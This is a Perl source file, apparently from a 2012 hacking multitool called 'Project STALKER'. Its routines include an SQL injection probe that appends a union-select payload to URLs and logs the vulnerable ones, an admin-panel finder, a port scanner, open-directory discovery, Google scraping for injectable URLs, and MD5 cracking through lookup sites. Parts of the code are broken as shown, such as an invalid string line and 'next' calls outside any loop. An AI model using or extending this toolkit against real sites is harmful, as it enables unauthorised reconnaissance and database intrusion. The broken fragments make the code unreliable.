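# Uses a lexical instead of the package global $re.
sub base {
    my ($text) = @_;
    return encode_base64( $text, '' );
}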
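# Base64-decodes $_[0] and returns the decoded bytes unchanged.  The decoded
# data is not chomped, so input whose payload ends in a newline round-trips
# (base_de(base("x\n")) eq "x\n").  Uses a lexical instead of the package
# global $re.
sub base_de {
    my ($text) = @_;
    return decode_base64($text);
}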
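# Mirrors $url into the local file $dest with the shared LWP::UserAgent
# $nave.  Returns 1 when the request succeeded and the file exists, 0
# otherwise.  mirror() returns an HTTP::Response, which is always a true
# value, so the status has to be checked explicitly; 304 means the local copy
# was already current and is still a usable file.
sub download {
    my ( $url, $dest ) = @_;
    my $response = $nave->mirror( $url, $dest );
    if ( ( $response->is_success or $response->code == 304 ) and -f $dest ) {
        return 1;
    }
    return 0;
}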
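# Returns $_[0] as a MySQL-style hex literal: "abc" -> "0x616263".
# Every character is written with two digits; a bare "%x" would turn "\n"
# into "a" and shift every following byte, producing an invalid literal.
# Uses a lexical instead of the package global $hex.
sub hex_en {
    my ($string) = @_;
    my $hex = '0x';
    for my $char ( split //, $string ) {
        $hex .= sprintf "%02x", ord $char;
    }
    return $hex;
}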
# Inverse of hex_en(): strips an optional "0x" prefix and turns each pair of
# hex digits back into a character ("0x616263" -> "abc").  A dangling odd
# digit at the end is ignored.
sub hex_de {
    my ($text) = @_;
    $text =~ s/\A0x//;
    my @pairs = ( $text =~ /(..)/g );
    return join '', map { chr( hex $_ ) } @pairs;
}
# Inverse of ascii(): turns a comma-separated list of code points back into
# a string ("97,98,99" -> "abc").
sub ascii_de {
    my $csv = shift;
    my @codes = split /,/, $csv;
    return join( '', map { chr $_ } @codes );
}
# Windows only: queries WMI (root\cimv2, Win32_Process) through Win32::OLE
# and returns a hash of process caption => process id.  `in` is the
# Win32::OLE collection iterator imported at the top of the file.
sub getprocess {
    my %pid_of;
    my $locator = Win32::OLE->new("WbemScripting.SWbemLocator");
    my $wmi     = $locator->ConnectServer( "", "root\\cimv2" );
    for my $process ( in $wmi->InstancesOf("Win32_Process") ) {
        $pid_of{ $process->{Caption} } = $process->{ProcessId};
    }
    return %pid_of;
}
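# Windows only: terminates the process with id $pid via
# Win32::Process::KillProcess.  Returns 1 on success and 0 on failure; the
# barewords true/false used before were both non-empty strings and therefore
# both true to a caller testing the result.
sub killprocess {
    my $pid = shift;
    return Win32::Process::KillProcess( $pid, "" ) ? 1 : 0;
}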
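# Resolves host name $_[0] to its dotted-quad IPv4 address.  Returns nothing
# when the name does not resolve; passing the undef from gethostbyname()
# straight to inet_ntoa() would otherwise die with a bad-argument error.
sub getip {
    my ($host) = @_;
    my $packed = gethostbyname($host);
    return unless defined $packed;
    return inet_ntoa($packed);
}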
# Interactive FTP client for cmd_ftp: logs in to $ftp as $user/$pass and then
# loops on an "ftp>" prompt through the label/goto at the bottom until "exit"
# or "quit".  Commands are recognised with unanchored regexes, so a line such
# as "rmdir x" also satisfies /dir/ and lists the directory; arguments are
# taken from the captures of the matching regex.  Each failing server call
# prints "[-] Error".
sub ftp {
    my ( $ftp, $user, $pass ) = @_;
    if ( my $socket = Net::FTP->new($ftp) ) {
        if ( $socket->login( $user, $pass ) ) {
            print "\n[+] Enter of the server FTP\n\n";
          menu:
            print "\n\nftp>";
            chomp( my $cmd = <stdin> );
            print "\n\n";
            if ( $cmd =~ /help/ ) {
                print q(
help : show information
cd : change directory <dir>
dir : list a directory
mdkdir : create a directory <dir>
rmdir : delete a directory <dir>
pwd : directory
del : delete a file <file>
rename : change name of the a file <file1> <file2>
size : size of the a file <file>
put : upload a file <file>
get : download a file <file>
cdup : change dir <dir>
exit : ??
);
            }
            if ( $cmd =~ /dir/ig ) {
                if ( my @files = $socket->dir() ) {
                    for (@files) {
                        print "[+] " . $_ . "\n";
                    }
                }
                else {
                    print "\n\n[-] Error\n\n";
                }
            }
            if ( $cmd =~ /pwd/ig ) {
                print "[+] Path : " . $socket->pwd() . "\n";
            }
            if ( $cmd =~ /cd (.*)/ig ) {
                if ( $socket->cwd($1) ) {
                    print "[+] Directory changed\n";
                }
                else {
                    print "\n\n[-] Error\n\n";
                }
            }
            if ( $cmd =~ /cdup/ig ) {
                if ( my $dir = $socket->cdup() ) {
                    print "\n\n[+] Directory changed\n\n";
                }
                else {
                    print "\n\n[-] Error\n\n";
                }
            }
            if ( $cmd =~ /del (.*)/ig ) {
                if ( $socket->delete($1) ) {
                    print "[+] File deleted\n";
                }
                else {
                    print "\n\n[-] Error\n\n";
                }
            }
            if ( $cmd =~ /rename (.*) (.*)/ig ) {
                if ( $socket->rename( $1, $2 ) ) {
                    print "[+] File Updated\n";
                }
                else {
                    print "\n\n[-] Error\n\n";
                }
            }
            if ( $cmd =~ /mkdir (.*)/ig ) {
                if ( $socket->mkdir($1) ) {
                    print "\n\n[+] Directory created\n";
                }
                else {
                    print "\n\n[-] Error\n\n";
                }
            }
            if ( $cmd =~ /rmdir (.*)/ig ) {
                if ( $socket->rmdir($1) ) {
                    print "\n\n[+] Directory deleted\n";
                }
                else {
                    print "\n\n[-] Error\n\n";
                }
            }
            if ( $cmd =~ /exit/ig ) {
                # there is no loop inside this sub: next unwinds to a loop in
                # the caller (Perl warns "Exiting subroutine via next") or,
                # without one, dies with "Can't \"next\" outside a loop block"
                next;
            }
            if ( $cmd =~ /get (.*) (.*)/ig ) {
                print "\n\n[+] Downloading file\n\n";
                if ( $socket->get( $1, $2 ) ) {
                    print "[+] Download completed";
                }
                else {
                    print "\n\n[-] Error\n\n";
                }
            }
            if ( $cmd =~ /put (.*) (.*)/ig ) {
                print "\n\n[+] Uploading file\n\n";
                if ( $socket->put( $1, $2 ) ) {
                    print "[+] Upload completed";
                }
                else {
                    print "\n\n[-] Error\n\n";
                }
            }
            if ( $cmd =~ /quit/ ) {
                next;    # same mechanism as "exit" above
            }
            goto menu;    # back to the prompt
        }
        else {
            print "\n[-] Failed the login\n\n";
        }
    }
    else {
        print "\n\n[-] Error\n\n";
    }
}
# Looks the hash $target up on four public lookup sites and returns the
# first plaintext found, or the string "false01" when none answers.  Sites
# with tipo => 'get' get the hash appended to their URL (toma); the remaining
# one is POSTed (tomar) with its 'variables'.  keys %hash yields the sites in
# arbitrary order, and $target is interpolated into each regex unescaped.
# Uses the package global $code.
sub crackit {
    my $target = shift;
    chomp $target;
    my %hash = (
        'http://md5.hashcracking.com/search.php?md5=' => {
            'tipo'  => 'get',
            'regex' => "Cleartext of $target is (.*)",
        },
        'http://www.hashchecker.com/index.php?_sls=search_hash' => {
            'variables' => { 'search_field' => $target, 'Submit' => 'search' },
            'regex' =>
              "<td><li>Your md5 hash is :<br><li>$target is <b>(.*)<\/b>",
        },
        'http://md5.rednoize.com/?q=' => {
            'tipo'  => 'get',
            'regex' => "<div id=\"result\" >(.*)<\/div>"
        },
        'http://md52.altervista.org/index.php?md5=' => {
            'tipo'  => 'get',
            'regex' => "<br>Password: <font color=\"Red\">(.*)<\/font><\/b>"
        }
    );
    for my $data ( keys %hash ) {
        if ( $hash{$data}{tipo} eq "get" ) {
            $code = toma( $data . $target );
            if ( $code =~ /$hash{$data}{regex}/ig ) {
                my $found = $1;
                # "[Non Trovata]" is that site's not-found answer
                unless ( $found =~ /\[Non Trovata\]/ ) {
                    return $found;
                    last;    # unreachable after return
                }
            }
        }
        else {
            $code = tomar( $data, $hash{$data}{variables} );
            if ( $code =~ /$hash{$data}{regex}/ig ) {
                my $found = $1;
                return $found;
                last;    # unreachable after return
            }
        }
    }
    return "false01";
}
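# True (1) when $_[0] is exactly 32 characters long, the length of an MD5 hex
# digest; 0 otherwise, including for an undefined argument.  Always returns
# a defined scalar, so list-context callers no longer see an empty list.
sub ver_length {
    my ($text) = @_;
    return 0 unless defined $text;
    return length($text) == 32 ? 1 : 0;
}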
# Looks for open directory listings under $_[0]: fetches the page, extracts
# every link (get_links, deduplicated by repes) and, for each link on the
# same host, requests the directory part of its path and reports it when the
# reply contains "Index Of".  Hits go to the console and to
# logs/paths-found.txt.  $url and $code are package globals; $auth and
# $borrar are interpolated into regexes unescaped.
sub scanpaths {
    my $urla = $_[0];
    print "\n[+] Find paths in $urla\n\n\n";
    my @urls = repes( get_links( toma($urla) ) );
    for $url (@urls) {
        my $web = $url;
        my ( $scheme, $auth, $path, $query, $frag ) = uri_split($url);
        # keep links on the same host or relative ones (empty authority)
        if ( $_[0] =~ /$auth/ or $auth eq "" ) {
            if ( $path =~ /(.*)\/(.*)\.(.*)$/ ) {
                my $borrar = $2 . "." . $3;    # the file name to cut off
                if ( $web =~ /(.*)$borrar/ ) {
                    my $co = $1;
                    unless ( $co =~ /$auth/ ) {
                        $co = $urla . $co;    # relative path: prefix the start URL
                    }
                    $code = toma($co);
                    if ( $code =~ /Index Of/ig ) {
                        print "[Link] : " . $co . "\n";
                        saveyes( "logs/paths-found.txt", $co );
                    }
                }
            }
        }
    }
}
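# Tries a TCP connect (0.5 s timeout) to six well-known ports on host $_[0]
# and prints the port and service name for each one that accepts.  Ports
# are visited in numeric order so the report is stable; the indirect-object
# "new IO::Socket::INET(...)" spelling is replaced by a plain method call.
sub scanport {
    my ($host) = @_;
    my %service_of = (
        "21"   => "ftp",
        "22"   => "ssh",
        "25"   => "smtp",
        "80"   => "http",
        "110"  => "pop3",
        "3306" => "mysql"
    );
    print "[+] Scanning $host\n\n\n";
    for my $port ( sort { $a <=> $b } keys %service_of ) {
        my $probe = IO::Socket::INET->new(
            PeerAddr => $host,
            PeerPort => $port,
            Proto    => "tcp",
            Timeout  => 0.5
        );
        if ($probe) {
            print "[Port] : " . $port . " [Service] : " . $service_of{$port} . "\n";
            $probe->close;
        }
    }
    print "\n\n[+] Finish\n";
    return;
}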
# Requests $_[0]/<path> for every entry of the package global @panels (not
# defined in this part of the file) and reports the ones that answer with a
# success status (tomax returns the HTTP::Response).  Hits go to the console
# and to logs/panel-logs.txt.  $path and $code are package globals.
sub scanpanel {
    print "[+] Scanning $_[0]\n\n\n";
    for $path (@panels) {
        $code = tomax( $_[0] . "/" . $path );
        if ( $code->is_success ) {
            print "[Link] : " . $_[0] . "/" . $path . "\n";
            saveyes( "logs/panel-logs.txt", $_[0] . "/" . $path );
        }
    }
    print "\n\n[+] Finish\n";
}
# Scrapes Google result pages for query $a, requesting start=10 up to $b in
# steps of 10 (the first page, start=0, is never fetched), collects the
# /url?q= targets, and returns them cut at "=" (cortar) and deduplicated
# (repes).  $pages and $code are package globals; @founds is declared twice
# in the same scope, the second declaration taking the filtered list.
sub google {
    my ( $a, $b ) = @_;
    my @founds;
    for ( $pages = 10 ; $pages <= $b ; $pages = $pages + 10 ) {
        $code = toma(
            "http://www.google.com.ar/search?hl=&q=" . $a . "&start=$pages" );
        # result links are recognised by the "r" class preceding the href
        while ( $code =~ /(?<="r"><. href=")(.+?)"/mig ) {
            my $url = $1;
            if ( $url =~ /\/url\?q\=(.*?)\&\;/ ) {
                push( @founds, uri_unescape($1) );
            }
        }
    }
    my @founds = repes( cortar(@founds) );
    return @founds;
}
# Error-based check: appends "-1 union select 666 --" (joined with "+") to
# $page and reports the URL when MySQL's "different number of columns"
# message shows up in the reply.  Hits go to the console and to
# logs/sql-logs.txt.  $code1 is a package global; $pass1/$pass2 are lexical
# here and do not go through bypass().
sub sql {
    my ( $pass1, $pass2 ) = ( "+", "--" );
    my $page = shift;
    $code1 =
      toma( $page . "-1"
          . $pass1 . "union"
          . $pass1
          . "select"
          . $pass1 . "666"
          . $pass2 );
    if ( $code1 =~
        /The used SELECT statements have a different number of columns/ig )
    {
        print "[+] SQLI : $page\a\n";
        saveyes( "logs/sql-logs.txt", $page );
    }
}
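# Extracts every link attribute value (href, src, ...) from the HTML in
# $_[0] with HTML::LinkExtor and returns them as a list.  The package global
# @links that the agarrar() callback fills is reset on entry, so links found
# by an earlier call no longer leak into a later one.
sub get_links {
    my ($html) = @_;
    @links = ();
    HTML::LinkExtor->new( \&agarrar )->parse($html);
    return @links;

    # HTML::LinkExtor callback: receives (tag, attr => value, ...) for each
    # link tag and keeps the attribute values
    sub agarrar {
        my ( $tag, %attr_of ) = @_;
        push( @links, values %attr_of );
    }
}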
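# Returns the arguments with duplicates removed, keeping the first
# occurrence of each in order.  The "seen" set is a lexical so each call
# starts fresh; with the package global %repe, an item seen in any earlier
# call was silently dropped from later results.
sub repes {
    my %seen;
    my @limpio;
    for my $item (@_) {
        push @limpio, $item unless $seen{$item}++;
    }
    return @limpio;
}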
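# For each argument containing "=", keeps everything up to and including the
# first "=" and drops the rest ("http://h/p?id=5" -> "http://h/p?id=");
# arguments without "=" are returned unchanged.  Works on a copy of each
# element (the loop variable aliases the caller's array) and no longer leaves
# the package global @tengo behind.
sub cortar {
    my @nuevo;
    for my $item (@_) {
        my $cut = $item;
        $cut =~ s/=.*\z/=/s;
        push( @nuevo, $cut );
    }
    return @nuevo;
}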
# Prints the program banner in colour 11 and resets the colour afterwards
# (cprint comes from Color::Output).
sub head {
    my $banner = "\n\n-- == Project STALKER == --\n\n";
    cprint "\x0311";    # switch to colour 11
    print $banner;
    cprint "\x030";     # back to the default colour
}
# Prints the copyright line in colour 11 and resets the colour afterwards
# (cprint comes from Color::Output).
sub copyright {
    my $notice = "\n\n(C) Doddy Hackman 2012\n\n";
    cprint "\x0311";    # switch to colour 11
    print $notice;
    cprint "\x030";     # back to the default colour
}
# GETs $_[0] with the shared LWP::UserAgent $nave and returns the raw body
# (content, not decoded_content).
sub toma {
    my ($url) = @_;
    my $response = $nave->get($url);
    return $response->content;
}
# GETs $_[0] with the shared LWP::UserAgent $nave and returns the whole
# HTTP::Response (callers check is_success on it).
sub tomax {
    my ($url) = @_;
    return $nave->get($url);
}
# POSTs the form fields in hashref $var to $web with the shared
# LWP::UserAgent $nave and returns the raw response body.
sub tomar {
    my ( $web, $var ) = @_;
    my @form = %{$var};
    my $response = $nave->post( $web, \@form );
    return $response->content;
}
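# Opens a TCP connection to $host:$port (5 s timeout), sends $line followed
# by CRLF, reads up to 5000 bytes of reply and returns them with CRLF
# appended.  Returns nothing when the connection cannot be opened instead of
# dereferencing an undefined socket.  Uses a lexical reply buffer instead of
# the package global $re.
sub conectar {
    my ( $host, $port, $line ) = @_;
    my $sockex = IO::Socket::INET->new(
        PeerAddr => $host,
        PeerPort => $port,
        Proto    => "tcp",
        Timeout  => 5
    );
    return unless $sockex;
    my $reply = '';
    print $sockex $line . "\r\n";
    $sockex->read( $reply, 5000 );
    $sockex->close;
    return $reply . "\r\n";
}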
# Interactive MySQL client for cmd_mysql.  Connects with DBI using the DSN
# "dbi:mysql::<host>:3306" (empty database field), then reads statements
# from stdin until "exit", printing the column names and every row
# tab-separated.  rows() == -1 is treated as a failed statement.  $info, $re
# and @row are package globals.
sub enter {
    my ( $host, $user, $pass ) = @_;
    print "[+] Connecting to the server\n";
    $info = "dbi:mysql::" . $host . ":3306";
    # PrintError => 0: DBI stays quiet, errors are detected via rows() below
    if ( my $enter = DBI->connect( $info, $user, $pass, { PrintError => 0 } ) )
    {
        print "\n[+] Enter in the database";
        while (1) {
            print "\n\n\n[+] Query : ";
            chomp( my $ac = <stdin> );
            if ( $ac eq "exit" ) {
                $enter->disconnect;
                print "\n\n[+] Closing connection\n\n";
                last;
            }
            $re = $enter->prepare($ac);
            $re->execute();
            my $total    = $re->rows();
            my @columnas = @{ $re->{NAME} };
            if ( $total eq "-1" ) {
                print "\n\n[-] Query Error\n";
                next;
            }
            else {
                print "\n\n[+] Result of the query\n";
                if ( $total eq 0 ) {
                    print "\n\n[+] Not rows returned\n\n";
                }
                else {
                    print "\n\n[+] Rows returned : " . $total . "\n\n\n";
                    for (@columnas) {
                        print $_. "\t\t";
                    }
                    print "\n\n";
                    while ( @row = $re->fetchrow_array ) {
                        for (@row) {
                            print $_. "\t\t";
                        }
                        print "\n";
                    }
                }
            }
        }
    }
    else {
        print "\n[-] Error connecting\n";
    }
}
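# Returns $_[0] as a MySQL-style hex literal: "abc" -> "0x616263" (same job
# as hex_en()).  Every character is written with two digits; a bare "%x"
# would turn "\n" into "a" and shift every following byte, producing an
# invalid literal.  Uses a lexical instead of the package global $hex.
sub encode {
    my ($string) = @_;
    my $hex = '0x';
    for my $char ( split //, $string ) {
        $hex .= sprintf "%02x", ord $char;
    }
    return $hex;
}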
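# Appends $line plus a newline to the file $file.  Three-argument open with
# a lexical handle, and both open and close are checked: a failure is
# reported with warn (the routine stays best-effort, it does not die) and
# the close status is returned so a caller can tell whether the line landed.
sub saveyes {
    my ( $file, $line ) = @_;
    open( my $save, '>>', $file ) or do {
        warn "saveyes: cannot open $file: $!\n";
        return 0;
    };
    print {$save} $line . "\n";
    my $ok = close $save;
    warn "saveyes: cannot close $file: $!\n" unless $ok;
    return $ok;
}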
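# Appends $line plus a newline to logs/webs/<$name>, the per-target log the
# other routines write to.  Three-argument open with a lexical handle, and
# both open and close are checked: a failure (for example a missing
# logs/webs directory) is reported with warn rather than silently ignored,
# and the close status is returned.
sub savefile {
    my ( $name, $line ) = @_;
    my $file = "logs/webs/" . $name;
    open( my $save, '>>', $file ) or do {
        warn "savefile: cannot open $file: $!\n";
        return 0;
    };
    print {$save} $line . "\n";
    my $ok = close $save;
    warn "savefile: cannot close $file: $!\n" unless $ok;
    return $ok;
}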
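# Returns every entry of directory $_[0] as readdir() reports them
# (including "." and ".."), or an empty list when the directory cannot be
# opened.  The handle is lexical and released with closedir; close() does
# not release a directory handle.
sub coleccionar {
    my ($dir) = @_;
    opendir( my $dh, $dir ) or return;
    my @archivos = readdir $dh;
    closedir $dh;
    return @archivos;
}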
# Resolves $target, then screen-scrapes melissadata.com for City, Country
# and State/Region of the address and ip-adress.com for host names sharing
# it.  Both depend on the exact HTML of those sites.  `my $target` is
# declared twice in this scope (the second shadows the first); $total and
# $re are package globals.
sub infocon {
    my $target = shift;
    my $get    = gethostbyname($target);
    my $target = inet_ntoa($get);
    print "[+] Getting info\n\n\n";
    $total =
      "http://www.melissadata.com/lookups/iplocation.asp?ipaddress=$target";
    $re = toma($total);
    if ( $re =~ /City<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ ) {
        print "[+] City : $2\n";
    }
    else {
        print "[-] Not Found\n";
        copyright();
    }
    if ( $re =~ /Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ ) {
        print "[+] Country : $2\n";
    }
    if ( $re =~ /State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ ) {
        print "[+] State or Region : $2\n";
    }
    print "\n\n[+] Getting Hosts\n\n\n";
    my $code = toma( "http://www.ip-adress.com/reverse_ip/" . $target );
    # one host name per whois/<name> link in the reverse-IP page
    while ( $code =~ /whois\/(.*?)\">Whois/g ) {
        my $dns = $1;
        chomp $dns;
        print "[DNS] : $dns\n";
    }
}
# Submits $ob to the ringofsaturn.com whois form and returns the text of the
# <pre> block with the strings in @chau removed, or "Not Found" when that
# text does not look like a whois answer; returns nothing when the reply has
# no <pre> block at all.
# NOTE(review): the first element of @chau is not valid Perl as pasted
# ("""); it is probably an HTML entity such as &quot; that the paste
# rendered — confirm against the original file.
sub whois {
    my $ob   = shift;
    my $code = tomar(
        "http://networking.ringofsaturn.com/Tools/whois.php",
        { "domain" => $ob, "submit" => "submit" }
    );
    my @chau = ( """, ">>>", "<<<" );
    # /s so the <pre> body may span lines
    if ( $code =~ /<pre>(.*?)<\/pre>/sig ) {
        my $resul = $1;
        chomp $resul;
        for my $cha (@chau) {
            $resul =~ s/$cha//ig;    # $cha is used as a regex, unescaped
        }
        if ( $resul =~ /Whois Server Version/ ) {
            return $resul;
        }
        else {
            return "Not Found";
        }
    }
}
# Derives the per-target log name from URL $_[0]: the authority part
# (host[:port]) with its first ":" turned into "_" so it is usable as a
# file name.
sub partimealmedio {
    my ($url) = @_;
    my $authority = ( uri_split($url) )[1];
    ( my $save = $authority ) =~ s/:/_/;
    return $save;
}
# Prints the command list for the interactive prompt in colour 5 and resets
# the colour afterwards (cprint comes from Color::Output).
sub helpme {
    cprint "\x035";
    print qq(
This program was coded By Doddy Hackman in the year 2012
[+] Commands :
[++] cmd_getinfo [Windows Only]
[++] cmd_getip <host>
[++] cmd_getlink <page>
[++] cmd_getprocess [Windows Only]
[++] cmd_killprocess <pid process> [Windows Only]
[++] cmd_conec <host> <port> <command>
[++] cmd_allow <host>
[++] cmd_paths <page>
[++] cmd_encodehex <text>
[++] cmd_decodehex <text>
[++] cmd_encodeascii <text>
[++] cmd_decodeascii <text>
[++] cmd_encodebase <text>
[++] cmd_decodebase <text>
[++] cmd_scanport <host>
[++] cmd_panel <page>
[++] cmd_getpass <hash>
[++] cmd_kobra <page>
[++] cmd_ftp <host> <user> <pass>
[++] cmd_mysql <host> <user> <pass>
[++] cmd_locate <ip>
[++] cmd_whois <dom>
[++] cmd_navegator
[++] cmd_scangoogle
[++] cmd_help
[++] cmd_exit
);
    cprint "\n\n\n\x030";
}
- # The End ?